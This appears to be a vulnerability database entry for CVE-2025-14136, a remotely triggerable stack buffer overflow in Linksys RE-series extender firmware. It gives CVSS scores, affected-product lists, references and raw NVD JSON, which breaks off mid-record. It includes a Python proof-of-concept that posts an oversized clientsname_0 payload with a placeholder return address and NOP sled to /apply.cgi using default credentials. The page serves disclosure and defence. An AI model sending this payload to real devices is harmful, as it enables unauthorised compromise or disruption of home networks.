CVE-2025-14136

Description

A security flaw has been discovered in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This vulnerability affects the function RE2000v2Repeater_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Linksys RE6500 固件 1.0.013.001

Linksys RE6250 固件 1.0.04.001

Linksys RE6300 固件 1.0.04.002

Linksys RE6350 固件 1.1.05.003

Linksys RE7000 固件 1.2.07.001

Linksys RE9000 固件 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-14136 PoC - Linksys RE Series Buffer Overflow
Note: This PoC is for educational and security research purposes only.
"""

import requests
import sys

TARGET_IP = "192.168.1.1"  # Replace with target device IP
TARGET_PORT = 80
USERNAME = "admin"  # Default credentials
PASSWORD = "admin"

def create_exploit_payload():
    """Generate overflow payload"""
    # Buffer size for the vulnerable function
    buffer_size = 256
    # Padding to fill the buffer
    padding = b'A' * buffer_size
    # Overwrite return address (example address)
    return_addr = b'\x42\x42\x42\x42'
    # Shellcode placeholder
    shellcode = b'\x90' * 100
    
    payload = padding + return_addr + shellcode
    return payload

def exploit_cve_2025_14136():
    """Send exploit request to vulnerable endpoint"""
    target_url = f"http://{TARGET_IP}:{TARGET_PORT}/apply.cgi"
    
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Vulnerable parameter: clientsname_0
    data = {
        'clientsname_0': create_exploit_payload(),
        'submit_button': 'Wizard',
        'change_action': 'gozila_cgi'
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending exploit payload...")
    print(f"[*] Payload size: {len(create_exploit_payload())} bytes")
    
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-14136 Linksys RE Series Buffer Overflow PoC")
    print("=" * 60)
    exploit_cve_2025_14136()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14136
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14136
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14136/
[4] VulDB https://vuldb.com/cve/CVE-2025-14136
[5] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md
[6] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md#poc
[7] https://vuldb.com/?ctiid.334525
[8] https://vuldb.com/?id.334525
[9] https://vuldb.com/?submit.697983
[10] https://www.linksys.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14136", "sourceIdentifier": "[email protected]", "published": "2025-12-06T13:15:59.820", "lastModified": "2025-12-10T18:00:03.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This vulnerability affects the function RE2000v2Repeater_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:*", "matchCriteriaId": "92354C9C-D1B2-4143-803D-DE5EF7842184"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "52622B22-2E42-443B-81DA-7C42ECCF0564"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:*", "matchCriteriaId": "70728D67-153A-49FA-80E2-0DE9086DA253"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "898FD49F-4225-47FF-822C-9E4FFB5EE192"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:*", "matchCriteriaId": "1E3A6A93-D598-4F52-808C-EAA45B468066"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "25647318-6422-418C-99B8-C806FF490028"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": ... (truncated)